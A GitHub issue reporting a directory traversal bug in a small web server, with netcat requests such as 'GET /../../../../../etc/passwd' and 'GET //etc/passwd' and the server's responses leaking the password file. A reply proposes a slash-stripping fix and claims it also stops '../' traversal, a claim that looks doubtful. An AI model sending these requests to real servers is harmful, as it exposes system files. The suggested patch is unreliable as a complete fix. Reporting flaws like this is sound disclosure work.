New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

security issue with requests outside of www root #2

Open
Cotix opened this Issue Jul 5, 2016 · 1 comment

Comments

Projects
None yet
2 participants
@Cotix

Cotix commented Jul 5, 2016

It is possible to request parent directories.

cotix@lithium:~$ nc localhost 9999
GET /../../../../../etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash
... my whole /etc/passwd

It is also possible to query absolute paths:

cotix@lithium:~$ nc localhost 9999
GET //etc/passwd HTTP/1.0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 2333
Content-type: text/plain

root0:0:root:/root:/bin/bash

@Cotix Cotix changed the title from security issue with parent directory request to security issue with requests outside of www root Jul 5, 2016

@timsoftgit

This comment has been minimized.

timsoftgit commented May 30, 2017

this can be fixed by changing the lines

 if(uri[0] == '/'){
         filename = uri + 1;

for
while (filename[0] == '/') { filename = filename+1; }
and removing the extra closing brace }
it prevents the //etc/passwd style direct path hack and seems to prevent /../../../etc/passwd style indirect directory hack as well

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment